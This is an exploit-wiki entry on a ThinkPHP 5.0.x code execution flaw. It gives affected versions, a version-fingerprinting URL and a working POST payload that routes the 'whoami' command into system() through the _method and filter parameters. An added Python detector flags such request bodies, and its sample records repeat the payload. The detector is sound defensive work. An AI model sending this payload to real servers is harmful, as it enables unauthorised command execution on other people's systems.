ThinkPHP 5.0.13 Code Execution Vulnerability
From PwnWiki
Affected versions
ThinkPHP <= v5.0.19
Exploitation
Determine the ThinkPHP version from the error page:
http://127.0.0.1/tk5/public/index.php/111
Payload
http://127.0.0.1/tk5/public/index.php
Send the following data via POST:
s=whoami&_method=__construct&method=&filter[]=system
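A defender-side check for the request shown above, as an added example that is not part of the original page: it flags urlencoded POST bodies whose `_method` override is not an HTTP verb or that carry a client-supplied `filter` parameter, including the percent-encoded form of the key. The function names and sample records are constructed for illustration, and it assumes the application uses the `_method` parameter name seen in the payload.

```python
import re
from urllib.parse import parse_qsl

# HTTP verbs a method-override parameter can legitimately carry.
ALLOWED_OVERRIDES = {"GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS"}
# Assumption: the override parameter keeps the name seen in the page's payload.
OVERRIDE_PARAM = "_method"
# Matches filter, filter[], filter[0], filter[name] after URL decoding.
FILTER_KEY = re.compile(r"^filter(\[[^\]]*\])?$")


def inspect_body(body):
    """Return the reasons a urlencoded POST body resembles the request on this page."""
    findings = []
    # keep_blank_values=True so an empty `method=` pair is not silently dropped.
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key == OVERRIDE_PARAM and value.upper() not in ALLOWED_OVERRIDES:
            findings.append(f"method override is not an HTTP verb: {value!r}")
        if FILTER_KEY.match(key):
            findings.append(f"client-supplied filter callback: {value!r}")
    return findings


def triage(records):
    """records: iterable of (request_id, http_method, body). Returns hits only."""
    hits = {}
    for request_id, http_method, body in records:
        if http_method.upper() != "POST":
            continue
        findings = inspect_body(body)
        if findings:
            hits[request_id] = findings
    return hits


# Constructed sample records (not real traffic); r2 is the body shown on this page,
# r3 is the same body with the bracket characters percent-encoded.
SAMPLE = [
    ("r1", "POST", "username=alice&_method=PUT&bio=hello"),
    ("r2", "POST", "s=whoami&_method=__construct&method=&filter[]=system"),
    ("r3", "POST", "s=whoami&_method=__construct&method=&filter%5B%5D=system"),
    ("r4", "GET", ""),
]

if __name__ == "__main__":
    for request_id, findings in triage(SAMPLE).items():
        print(request_id, findings)
```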